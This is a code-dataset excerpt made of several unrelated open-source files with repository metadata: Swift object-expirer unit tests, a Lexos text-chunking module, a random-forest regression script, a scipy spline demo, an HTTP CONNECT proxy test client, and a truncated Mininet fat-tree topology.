[{'name': '%d-actual-obj' % ts}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.iter_containers = lambda: [str(int(time() - 86400))]
x.delete_actual_object = deliberately_blow_up
x.pop_queue = should_not_get_called
x.run_once()
error_lines = x.logger.get_lines_for_level('error')
self.assertEqual(
error_lines,
['Exception while deleting object %d %d-actual-obj '
'failed to delete actual object: ' % (ts, ts)])
self.assertEqual(
x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
# Reverse test to be sure it still would blow up the way expected.
ts = int(time() - 86400)
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-actual-obj' % ts}])
self.logger._clear()
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = lambda o, t: None
x.pop_queue = should_not_get_called
x.run_once()
self.assertEqual(
self.logger.get_lines_for_level('error'),
['Exception while deleting object %d %d-actual-obj This should '
'not have been called: ' % (ts, ts)])
def test_success_gets_counted(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': '%d-acc/c/actual-obj' % int(time() - 86400)}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = lambda o, t: None
x.pop_queue = lambda c, o: None
self.assertEqual(x.report_objects, 0)
with mock.patch('swift.obj.expirer.MAX_OBJECTS_TO_CACHE', 0):
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(
x.logger.get_lines_for_level('info'),
['Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 1 objects expired'])
def test_delete_actual_object_does_not_get_unicode(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
pass
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
got_unicode = [False]
def delete_actual_object_test_for_unicode(actual_obj, timestamp):
if isinstance(actual_obj, six.text_type):
got_unicode[0] = True
fake_swift = InternalClient(
[{'name': str(int(time() - 86400))}],
[{'name': u'%d-actual-obj' % int(time() - 86400)}])
x = expirer.ObjectExpirer(self.conf, logger=self.logger,
swift=fake_swift)
x.delete_actual_object = delete_actual_object_test_for_unicode
x.pop_queue = lambda c, o: None
self.assertEqual(x.report_objects, 0)
x.run_once()
self.assertEqual(x.report_objects, 1)
self.assertEqual(
x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 1 objects expired',
])
self.assertFalse(got_unicode[0])
def test_failed_delete_continues_on(self):
class InternalClient(object):
container_ring = None
def __init__(self, containers, objects):
self.containers = containers
self.objects = objects
def get_account_info(*a, **kw):
return 1, 2
def iter_containers(self, *a, **kw):
return self.containers
def delete_container(*a, **kw):
raise Exception('failed to delete container')
def delete_object(*a, **kw):
pass
def iter_objects(self, *a, **kw):
return self.objects
def fail_delete_actual_object(actual_obj, timestamp):
raise Exception('failed to delete actual object')
x = expirer.ObjectExpirer(self.conf, logger=self.logger)
cts = int(time() - 86400)
ots = int(time() - 86400)
containers = [
{'name': str(cts)},
{'name': str(cts + 1)},
]
objects = [
{'name': '%d-actual-obj' % ots},
{'name': '%d-next-obj' % ots}
]
x.swift = InternalClient(containers, objects)
x.delete_actual_object = fail_delete_actual_object
x.run_once()
error_lines = x.logger.get_lines_for_level('error')
self.assertEqual(sorted(error_lines), sorted([
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object: ' % (cts, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object: ' % (cts, ots),
'Exception while deleting object %d %d-actual-obj failed to '
'delete actual object: ' % (cts + 1, ots),
'Exception while deleting object %d %d-next-obj failed to '
'delete actual object: ' % (cts + 1, ots),
'Exception while deleting container %d failed to delete '
'container: ' % (cts,),
'Exception while deleting container %d failed to delete '
'container: ' % (cts + 1,)]))
self.assertEqual(x.logger.get_lines_for_level('info'), [
'Pass beginning; 1 possible containers; 2 possible objects',
'Pass completed in 0s; 0 objects expired',
])
def test_run_forever_initial_sleep_random(self):
global last_not_sleep
def raise_system_exit():
raise SystemExit('test_run_forever')
interval = 1234
x = expirer.ObjectExpirer({'__file__': 'unit_test',
'interval': interval})
orig_random = expirer.random
orig_sleep = expirer.sleep
try:
expirer.random = not_random
expirer.sleep = not_sleep
x.run_once = raise_system_exit
x.run_forever()
except SystemExit as err:
pass
finally:
expirer.random = orig_random
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'test_run_forever')
self.assertEqual(last_not_sleep, 0.5 * interval)
def test_run_forever_catches_usual_exceptions(self):
raises = [0]
def raise_exceptions():
raises[0] += 1
if raises[0] < 2:
raise Exception('exception %d' % raises[0])
raise SystemExit('exiting exception %d' % raises[0])
x = expirer.ObjectExpirer({}, logger=self.logger)
orig_sleep = expirer.sleep
try:
expirer.sleep = not_sleep
x.run_once = raise_exceptions
x.run_forever()
except SystemExit as err:
pass
finally:
expirer.sleep = orig_sleep
self.assertEqual(str(err), 'exiting exception 2')
self.assertEqual(x.logger.get_lines_for_level('error'),
['Unhandled exception: '])
log_args, log_kwargs = x.logger.log_dict['error'][0]
self.assertEqual(str(log_kwargs['exc_info'][1]),
'exception 1')
def test_delete_actual_object(self):
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
self.assertEqual(got_env[0]['HTTP_X_TIMESTAMP'],
got_env[0]['HTTP_X_IF_DELETE_AT'])
def test_delete_actual_object_nourlquoting(self):
# delete_actual_object should not do its own url quoting because
# internal client's make_request handles that.
got_env = [None]
def fake_app(env, start_response):
got_env[0] = env
start_response('204 No Content', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
ts = '1234'
x.delete_actual_object('/path/to/object name', ts)
self.assertEqual(got_env[0]['HTTP_X_IF_DELETE_AT'], ts)
self.assertEqual(got_env[0]['HTTP_X_TIMESTAMP'],
got_env[0]['HTTP_X_IF_DELETE_AT'])
self.assertEqual(got_env[0]['PATH_INFO'], '/v1/path/to/object name')
def test_delete_actual_object_raises_404(self):
def fake_app(env, start_response):
start_response('404 Not Found', [('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
self.assertRaises(internal_client.UnexpectedResponse,
x.delete_actual_object, '/path/to/object', '1234')
def test_delete_actual_object_raises_412(self):
def fake_app(env, start_response):
start_response('412 Precondition Failed',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
self.assertRaises(internal_client.UnexpectedResponse,
x.delete_actual_object, '/path/to/object', '1234')
def test_delete_actual_object_does_not_handle_odd_stuff(self):
def fake_app(env, start_response):
start_response(
'503 Internal Server Error',
[('Content-Length', '0')])
return []
internal_client.loadapp = lambda *a, **kw: fake_app
x = expirer.ObjectExpirer({})
exc = None
try:
x.delete_actual_object('/path/to/object', '1234')
except Exception as err:
exc = err
finally:
pass
self.assertEqual(503, exc.resp.status_int)
def test_delete_actual_object_quotes(self):
name = 'this name should get quoted'
timestamp = '1366063156.863045'
x = expirer.ObjectExpirer({})
x.swift.make_request = mock.MagicMock()
x.delete_actual_object(name, timestamp)
self.assertEqual(x.swift.make_request.call_count, 1)
self.assertEqual(x.swift.make_request.call_args[0][1],
'/v1/' + urllib.parse.quote(name))
def test_pop_queue(self):
class InternalClient(object):
container_ring = FakeRing()
x = expirer.ObjectExpirer({}, logger=self.logger,
swift=InternalClient())
requests = []
def capture_requests(ipaddr, port, method, path, *args, **kwargs):
requests.append((method, path))
with mocked_http_conn(
200, 200, 200, give_connect=capture_requests) as fake_conn:
x.pop_queue('c', 'o')
self.assertRaises(StopIteration, fake_conn.code_iter.next)
for method, path in requests:
self.assertEqual(method, 'DELETE')
device, part, account, container, obj = utils.split_path(
path, 5, 5, True)
self.assertEqual(account, '.expiring_objects')
self.assertEqual(container, 'c')
self.assertEqual(obj, 'o')
if __name__ == '__main__':
main()
|
apache-2.0
| 5,540,752,920,553,979,000
| 34.861893
| 78
| 0.54525
| false
| 4.07202
| true
| false
| false
|
TheLady/Lexos
|
processors/prepare/cutter.py
|
1
|
14378
|
import re
from Queue import Queue
from math import ceil
from types import *
WHITESPACE = ['\n', '\t', ' ', '', u'\u3000']
# from helpers.constants import WHITESPACE
def splitKeepWhitespace(string):
"""
Splits the string on whitespace, while keeping the tokens on which the string was split.
Args:
string: The string to split.
Returns:
The split string with the whitespace kept.
"""
return re.split(u'(\u3000|\n| |\t)', string)
# Note: Regex in capture group keeps the delimiter in the resultant list
def countWords(textList): # Ignores WHITESPACE as being 'not words'
"""
Counts the "words" in a list of tokens, where words are anything not in the WHITESPACE global.
Args:
textList: A list of tokens in the text.
Returns:
The number of words in the list.
"""
return len([x for x in textList if x not in WHITESPACE])
def stripLeadingWhiteSpace(q):
"""
Takes in the queue representation of the text and strips the leading whitespace.
Args:
q: The text in a Queue object.
Returns:
None
"""
if not q.empty():
while q.queue[0] in WHITESPACE:
trash = q.get()
if q.empty():
break
def stripLeadingBlankLines(q):
"""
Takes in the queue representation of the text and strips the leading blank lines.
Args:
q: The text in a Queue object.
Returns:
None
"""
while q.queue == '':
trash = q.get()
if q.empty():
break
def stripLeadingCharacters(charQueue, numChars):
"""
Takes in the queue representation of the text and strips the leading numChars characters.
Args:
charQueue: The text in a Queue object.
numChars: The number of characters to remove.
Returns:
None
"""
for i in xrange(numChars):
removedChar = charQueue.get()
def stripLeadingWords(wordQueue, numWords):
"""
Takes in the queue representation of the text and strips the leading numWords words.
Args:
wordQueue: The text in a Queue object.
numWords: The number of words to remove.
Returns:
None
"""
for i in xrange(numWords):
stripLeadingWhiteSpace(wordQueue)
removedWord = wordQueue.get()
stripLeadingWhiteSpace(wordQueue)
def stripLeadingLines(lineQueue, numLines):
"""
Takes in the queue representation of the text and strips the leading numLines lines.
Args:
lineQueue: The text in a Queue object.
numLines: The number of lines to remove.
Returns:
None
"""
for i in xrange(numLines):
stripLeadingBlankLines(lineQueue)
removedLine = lineQueue.get()
stripLeadingBlankLines(lineQueue)
def cutByCharacters(text, chunkSize, overlap, lastProp):
"""
Cuts the text into equally sized chunks, where the segment size is measured by counts of characters,
with an option for an amount of overlap between chunks and a minimum proportion threshold for the last chunk.
Args:
text: The string with the contents of the file.
chunkSize: The size of the chunk, in characters.
overlap: The number of characters to overlap between chunks.
lastProp: The minimum proportional size that the last chunk has to be.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
tillNextChunk = chunkSize - overlap # The distance between the starts of chunks
for token in text:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
stripLeadingCharacters(charQueue=chunkSoFar, numChars=tillNextChunk)
currChunkSize -= tillNextChunk
chunkSoFar.put(token)
# Making sure the last chunk is of a sufficient proportion
lastChunk = list(chunkSoFar.queue)
if (float(len(lastChunk)) / chunkSize) < lastProp:
if len(chunkList)==0:
chunkList.extend(lastChunk)
else:
chunkList[-1].extend(lastChunk)
else:
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
countSubList = 0
stringList=[]
for subList in chunkList:
stringList.extend([''.join(subList)])
if type(subList) is ListType:
countSubList+=1
# Prevent there isn't subList inside chunkList
if countSubList==0:
stringList = []
stringList.extend([''.join(chunkList)])
return stringList
def cutByWords(text, chunkSize, overlap, lastProp):
"""
Cuts the text into equally sized chunks, where the segment size is measured by counts of words,
with an option for an amount of overlap between chunks and a minim
um proportion threshold for the last chunk.
Args:
text: The string with the contents of the file.
chunkSize: The size of the chunk, in words.
overlap: The number of words to overlap between chunks.
lastProp: The minimum proportional size that the last chunk has to be.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
tillNextChunk = chunkSize - overlap # The distance between the starts of chunks
splitText = splitKeepWhitespace(text)
# Create list of chunks (chunks are lists of words and whitespace) by using a queue as a rolling window
for token in splitText:
if token in WHITESPACE:
chunkSoFar.put(token)
else:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
stripLeadingWords(wordQueue=chunkSoFar, numWords=tillNextChunk)
currChunkSize -= tillNextChunk
chunkSoFar.put(token)
# Making sure the last chunk is of a sufficient proportion
lastChunk = list(chunkSoFar.queue) # Grab the final (partial) chunk
if (float(countWords(lastChunk)) / chunkSize) < lastProp: # If the proportion of the last chunk is too low
if len(chunkList)==0:
chunkList.extend(lastChunk)
else:
chunkList[-1].extend(lastChunk)
else:
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
countSubList = 0
stringList=[]
for subList in chunkList:
stringList.extend([''.join(subList)])
if type(subList) is ListType:
countSubList+=1
# Prevent there isn't subList inside chunkList
if countSubList==0:
stringList = []
stringList.extend([''.join(chunkList)])
return stringList
def cutByLines(text, chunkSize, overlap, lastProp):
"""
Cuts the text into equally sized chunks, where the segment size is measured by counts of lines,
with an option for an amount of overlap between chunks and a minimum proportion threshold for the last chunk.
Args:
text: The string with the contents of the file.
chunkSize: The size of the chunk, in lines.
overlap: The number of lines to overlap between chunks.
lastProp: The minimum proportional size that the last chunk has to be.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a. a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
tillNextChunk = chunkSize - overlap # The distance between the starts of chunks
splitText = text.splitlines(True)
# Create list of chunks (chunks are lists of words and whitespace) by using a queue as a rolling window
for token in splitText:
if token == '':
chunkSoFar.put(token)
else:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
stripLeadingLines(lineQueue=chunkSoFar, numLines=tillNextChunk)
currChunkSize -= tillNextChunk
chunkSoFar.put(token)
# Making sure the last chunk is of a sufficient proportion
lastChunk = list(chunkSoFar.queue) # Grab the final (partial) chunk
if (float(countWords(lastChunk)) / chunkSize) < lastProp: # If the proportion of the last chunk is too low
if len(chunkList)==0:
chunkList.extend(lastChunk)
else:
chunkList[-1].extend(lastChunk)
else:
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
countSubList = 0
stringList=[]
for subList in chunkList:
stringList.extend([''.join(subList)])
if type(subList) is ListType:
countSubList+=1
# Prevent there isn't subList inside chunkList
if countSubList==0:
stringList = []
stringList.extend([''.join(chunkList)])
return stringList
def cutByNumber(text, numChunks):
"""
Cuts the text into equally sized chunks, where the size of the chunk is determined by the number of desired chunks.
Args:
text: The string with the contents of the file.
numChunks: The number of chunks to cut the text into.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a. a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
splitText = splitKeepWhitespace(text)
textLength = countWords(splitText)
chunkSizes = []
for i in xrange(numChunks):
chunkSizes.append(textLength / numChunks)
for i in xrange(textLength % numChunks):
chunkSizes[i] += 1
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
chunkIndex = 0
chunkSize = chunkSizes[chunkIndex]
# Create list of chunks (chunks are lists of words and whitespace) by using a queue as a rolling window
for token in splitText:
if token in WHITESPACE:
chunkSoFar.put(token)
else:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
chunkSoFar.queue.clear()
currChunkSize = 1
chunkSoFar.put(token)
chunkIndex += 1
chunkSize = chunkSizes[chunkIndex]
else:
chunkSoFar.put(token)
lastChunk = list(chunkSoFar.queue) # Grab the final (partial) chunk
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
stringList = [''.join(subList) for subList in chunkList]
return stringList
def cutByMilestone(text, cuttingValue):
"""
Cuts the file into as many chunks as there are instances of the
substring cuttingValue. Chunk boundaries are made wherever
the string appears.
Args: text -- the text to be chunked as a single string
Returns: A list of strings which are to become the new chunks.
"""
chunkList = [] #container for chunks
lenMS = len(cuttingValue) #length of milestone term
cuttingValue = cuttingValue.encode('utf-8')
if len(cuttingValue) > 0:
chunkstop = text.find(cuttingValue) #first boundary
print len(cuttingValue)
while chunkstop == 0: #trap for error when first word in file is Milestone
text = text[lenMS:]
chunkstop = text.find(cuttingValue)
while chunkstop >= 0: #while next boundary != -1 (while next boundary exists)
print chunkstop
nextchunk = text[:chunkstop-1] #new chunk = current text up to boundary index
text = text[chunkstop+lenMS:] #text = text left after the boundary
chunkstop = text.find(cuttingValue) #first boundary
while chunkstop == 0:
if chunkstop == 0: #trap for error when first word in file is Milestone
text = text[lenMS:]
chunkstop = text.find(cuttingValue)
chunkList.append(nextchunk) #append this chunk to chunk list
if len(text) > 0 :
chunkList.append(text)
else:
chunkList.append(text)
return chunkList
def cut(text, cuttingValue, cuttingType, overlap, lastProp):
"""
Cuts each text string into various segments according to the options chosen by the user.
Args:
text: A string with the text to be split
cuttingValue: The value by which to cut the texts by.
cuttingType: A string representing which cutting method to use.
overlap: A unicode string representing the number of words to be overlapped between each text segment.
lastProp: A unicode string representing the minimum proportion percentage the last chunk has to be to not get assimilated by the previous.
Returns:
A list of strings, each representing a chunk of the original.
"""
cuttingType = str(cuttingType)
if cuttingType != 'milestone' :
cuttingValue = int(cuttingValue)
overlap = int(overlap)
lastProp = float(lastProp.strip('%')) / 100
if cuttingType == 'letters':
stringList = cutByCharacters(text, cuttingValue, overlap, lastProp)
elif cuttingType == 'words':
stringList = cutByWords(text, cuttingValue, overlap, lastProp)
elif cuttingType == 'lines':
stringList = cutByLines(text, cuttingValue, overlap, lastProp)
elif cuttingType == 'milestone':
stringList = cutByMilestone(text, cuttingValue)
else:
stringList = cutByNumber(text, cuttingValue)
return stringList
|
mit
| 5,435,624,853,086,091,000
| 31.90389
| 146
| 0.648839
| false
| 4.185735
| false
| false
| false
|
drabastomek/practicalDataAnalysisCookbook
|
Codes/Chapter06/regression_randomForest.py
|
1
|
2303
|
# this is needed to load helper from the parent folder
import sys
sys.path.append('..')
# the rest of the imports
import helper as hlp
import pandas as pd
import numpy as np
import sklearn.ensemble as en
import sklearn.cross_validation as cv
@hlp.timeit
def regression_rf(x,y):
'''
Estimate a random forest regressor
'''
# create the regressor object
random_forest = en.RandomForestRegressor(
min_samples_split=80, random_state=666,
max_depth=5, n_estimators=10)
# estimate the model
random_forest.fit(x,y)
# return the object
return random_forest
# the file name of the dataset
r_filename = '../../Data/Chapter06/power_plant_dataset_pc.csv'
# read the data
csv_read = pd.read_csv(r_filename)
# select the names of columns
dependent = csv_read.columns[-1]
independent_reduced = [
col
for col
in csv_read.columns
if col.startswith('p')
]
independent = [
col
for col
in csv_read.columns
if col not in independent_reduced
and col not in dependent
]
# split into independent and dependent features
x = csv_read[independent]
y = csv_read[dependent]
# estimate the model using all variables (without PC)
regressor = regression_rf(x,y)
# print out the results
print('R: ', regressor.score(x,y))
# test the sensitivity of R2
scores = cv.cross_val_score(regressor, x, y, cv=100)
print('Expected R2: {0:.2f} (+/- {1:.2f})'\
.format(scores.mean(), scores.std()**2))
# print features importance
for counter, (nm, label) \
in enumerate(
zip(x.columns, regressor.feature_importances_)
):
print("{0}. {1}: {2}".format(counter, nm,label))
# estimate the model using only the most important feature
features = np.nonzero(regressor.feature_importances_ > 0.001)
x_red = csv_read[features[0]]
regressor_red = regression_rf(x_red,y)
# print out the results
print('R: ', regressor_red.score(x_red,y))
# test the sensitivity of R2
scores = cv.cross_val_score(regressor_red, x_red, y, cv=100)
print('Expected R2: {0:.2f} (+/- {1:.2f})'\
.format(scores.mean(), scores.std()**2))
# print features importance
for counter, (nm, label) \
in enumerate(
zip(x_red.columns, regressor_red.feature_importances_)
):
print("{0}. {1}: {2}".format(counter, nm,label))
|
gpl-2.0
| 5,688,512,074,880,824,000
| 24.318681
| 62
| 0.671298
| false
| 3.194175
| false
| false
| false
|
airekans/Snippet
|
python/numpy_scipy_learning/spline.py
|
1
|
1310
|
import numpy as np
import scipy as sp
from scipy.interpolate import UnivariateSpline
import matplotlib.pyplot as plt
x = [1, 2, 3, 4, 5, 6, 7]
y = [1, 4, 9, 16, 26, 30, 51]
# Test Spline
trajectory = np.array([x, y], dtype=float)
print trajectory
plt.plot(trajectory[0], trajectory[1])
plt.show()
s = sp.interpolate.UnivariateSpline(trajectory[0], trajectory[1])
smoothX = trajectory[0]
smoothTrajectory = np.array([smoothX, s(smoothX)])
print smoothTrajectory
# Results
plt.subplot(1, 2, 1)
plt.plot(trajectory[0])
plt.plot(smoothTrajectory[0])
plt.subplot(1, 2, 2)
plt.plot(trajectory[1])
plt.plot(smoothTrajectory[1])
plt.show()
# Test Spline 2
s = sp.interpolate.UnivariateSpline(trajectory[0], trajectory[1], s=1)
smoothX = trajectory[0]
smoothTrajectory = np.array([smoothX, s(smoothX)])
# Results
plt.subplot(1, 2, 1)
plt.plot(trajectory[0])
plt.plot(smoothTrajectory[0])
plt.subplot(1, 2, 2)
plt.plot(trajectory[1])
plt.plot(smoothTrajectory[1])
plt.show()
# Test Spline 3
s = sp.interpolate.UnivariateSpline(trajectory[0], trajectory[1], s=2)
smoothX = trajectory[0]
smoothTrajectory = np.array([smoothX, s(smoothX)])
# Results
plt.subplot(1, 2, 1)
plt.plot(trajectory[0])
plt.plot(smoothTrajectory[0])
plt.subplot(1, 2, 2)
plt.plot(trajectory[1])
plt.plot(smoothTrajectory[1])
plt.show()
|
unlicense
| -259,108,058,511,957,630
| 21.20339
| 70
| 0.726718
| false
| 2.723493
| false
| true
| false
|
kenshinx/rps
|
test/http_client.py
|
1
|
4579
|
#! /usr/bin/env python
import re
import socket
import optparse
HTTP_PROXY_HOST = "dev1"
HTTP_PROXY_PORT = 8889
HTTP_PROXY_HOST = "localhost"
HTTP_PROXY_PORT = 9891
HTTP_PROXY_UNAME = "rps"
HTTP_PROXY_PASSWD = "secret"
class HTTPTunnelPorxy(object):
pattern = re.compile("^HTTP\/1\.\d ([0-9]{3}) .*")
def __init__(self, proxy_host, proxy_port, proxy_uname, proxy_passwd):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.s.connect((proxy_host, proxy_port))
except:
print "can't connect porxy: %s:%d" %(proxy_host, proxy_port)
exit(1);
self.uname = proxy_uname;
self.passwd = proxy_passwd;
def handshake(self, host, port):
payload = "CONNECT %s:%d HTTP/1.1\r\n" %(host, port)
payload = payload + "HOST: %s\r\n" %host
payload = payload + "User-agent: RPS/HTTP PROXY\r\n"
payload = payload + "\r\n"
print "---------------------------------------------"
print "send:\n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
data = data.strip()
try:
code = self.pattern.findall(data)[0]
except Exception, e:
print "invalid http response"
return False
if code == "200":
print "handshake success"
return True
elif code == "407":
return self.authenticate(host, port)
else:
print "invalid http response code"
return False
def authenticate(self, host, port):
credential = "%s:%s" %(self.uname, self.passwd)
credential = credential.encode("base64")
credential = "Basic %s" %credential
print credential
payload = "CONNECT %s:%d HTTP/1.1\r\n" %(host, port)
payload = payload + "HOST: %s\r\n" %host
payload = payload + "User-agent: RPS/HTTP PROXY\r\n"
payload = payload + "Proxy-Authorization: %s\r\n" %credential
payload = payload + "\r\n"
print "---------------------------------------------"
print "send:\n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
data = data.strip()
try:
code = self.pattern.findall(data)[0]
except Exception, e:
print "invalid http response"
return False
if code == "200":
print "http authenticate success"
return True
elif code == "407":
print "http authenticate fail"
return False
else:
print "invalid http response code"
return False
def doHTTPRequest(self, host, port):
if not self.handshake(host, port):
return
payload = "GET / HTTP/1.1\r\n"
payload = payload + "HOST: %s\r\n" %host
payload = payload + "\r\n"
print "---------------------------------------------"
print "send: \n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
def doHTTPSRequest(self, host, port):
if not self.handshake(host, port):
return
payload = "GET https://%s HTTP/1.1\r\n" %host
payload = payload + "HOST: %s\r\n" %host
payload = payload + "\r\n"
print "---------------------------------------------"
print "send: \n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: %d character\n" %len(data)
print data
def doWhoisRequest(self, host, port, query):
if not self.handshake(host, port):
return
payload = "%s\r\n" %query
print "---------------------------------------------"
print "send: \n"
print payload
self.s.sendall(payload)
data = self.s.recv(1024)
print "recv: \n"
print data
def main():
proxy = HTTPTunnelPorxy(HTTP_PROXY_HOST, HTTP_PROXY_PORT,
HTTP_PROXY_UNAME, HTTP_PROXY_PASSWD)
proxy.doHTTPRequest("www.google.com", 80)
#proxy.doHTTPSRequest("www.google.com", 80)
#proxy.doWhoisRequest("whois.godaddy.com", 43, "kenshinx.me")
if __name__ == "__main__":
main()
|
mit
| -7,370,360,084,969,663,000
| 24.581006
| 74
| 0.505569
| false
| 3.831799
| false
| false
| false
|
calee0219/Course
|
SDN/Lab1/FatTreeTopoHardCode.py
|
1
|
4467
|
#!/usr/bin/env python
from mininet.topo import Topo
from mininet import net
from mininet.net import Mininet
POD_NUM = 4
class FatTreeTopoHardCode(Topo):
"""
A Simple FatTree Topo
"""
def __init__(self):
# Initialize topology
Topo.__init__(self)
# Create pod and core
## p0
p0h1 = self.addHost('p0h1')
p0h2 = self.addHost('p0h2')
p0h3 = self.addHost('p0h3')
p0h4 = self.addHost('p0h4')
## Edge Switch
p0e1 = self.addSwitch('p0e1')
p0e2 = self.addSwitch('p0e2')
## Aggregation
p0a1 = self.addSwitch('p0a1')
p0a2 = self.addSwitch('p0a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p0a1, p0e1, bw=100)
self.addLink(p0a1, p0e2, bw=100)
self.addLink(p0a2, p0e1, bw=100)
self.addLink(p0a2, p0e2, bw=100)
## Edge <-> Host
self.addLink(p0e1, p0h1, bw=100)
self.addLink(p0e1, p0h2, bw=100)
self.addLink(p0e2, p0h3, bw=100)
self.addLink(p0e2, p0h4, bw=100)
## p1
p1h1 = self.addHost('p1h1')
p1h2 = self.addHost('p1h2')
p1h3 = self.addHost('p1h3')
p1h4 = self.addHost('p1h4')
## Edge Switch
p1e1 = self.addSwitch('p1e1')
p1e2 = self.addSwitch('p1e2')
## Aggregation
p1a1 = self.addSwitch('p1a1')
p1a2 = self.addSwitch('p1a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p1a1, p1e1, bw=100)
self.addLink(p1a1, p1e2, bw=100)
self.addLink(p1a2, p1e1, bw=100)
self.addLink(p1a2, p1e2, bw=100)
## Edge <-> Host
self.addLink(p1e1, p1h1, bw=100)
self.addLink(p1e1, p1h2, bw=100)
self.addLink(p1e2, p1h3, bw=100)
self.addLink(p1e2, p1h4, bw=100)
## p2
p2h1 = self.addHost('p2h1')
p2h2 = self.addHost('p2h2')
p2h3 = self.addHost('p2h3')
p2h4 = self.addHost('p2h4')
## Edge Switch
p2e1 = self.addSwitch('p2e1')
p2e2 = self.addSwitch('p2e2')
## Aggregation
p2a1 = self.addSwitch('p2a1')
p2a2 = self.addSwitch('p2a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p2a1, p2e1, bw=100)
self.addLink(p2a1, p2e2, bw=100)
self.addLink(p2a2, p2e1, bw=100)
self.addLink(p2a2, p2e2, bw=100)
## Edge <-> Host
self.addLink(p2e1, p2h1, bw=100)
self.addLink(p2e1, p2h2, bw=100)
self.addLink(p2e2, p2h3, bw=100)
self.addLink(p2e2, p2h4, bw=100)
## p3
p3h1 = self.addHost('p3h1')
p3h2 = self.addHost('p3h2')
p3h3 = self.addHost('p3h3')
p3h4 = self.addHost('p3h4')
## Edge Switch
p3e1 = self.addSwitch('p3e1')
p3e2 = self.addSwitch('p3e2')
## Aggregation
p3a1 = self.addSwitch('p3a1')
p3a2 = self.addSwitch('p3a2')
# Add links (100Mbps)
## Agg <-> Edge
self.addLink(p3a1, p3e1, bw=100)
self.addLink(p3a1, p3e2, bw=100)
self.addLink(p3a2, p3e1, bw=100)
self.addLink(p3a2, p3e2, bw=100)
## Edge <-> Host
self.addLink(p3e1, p3h1, bw=100)
self.addLink(p3e1, p3h2, bw=100)
self.addLink(p3e2, p3h3, bw=100)
self.addLink(p3e2, p3h4, bw=100)
# Add core switch
p0c = self.addSwitch('p0c')
p1c = self.addSwitch('p1c')
p2c = self.addSwitch('p2c')
p3c = self.addSwitch('p3c')
# Link Core to pod
## p0c
self.addLink(p0c, p0a1, bw=1000, loss=2)
self.addLink(p0c, p1a1, bw=1000, loss=2)
self.addLink(p0c, p2a1, bw=1000, loss=2)
self.addLink(p0c, p3a1, bw=1000, loss=2)
## p1c
self.addLink(p1c, p0a1, bw=1000, loss=2)
self.addLink(p1c, p1a1, bw=1000, loss=2)
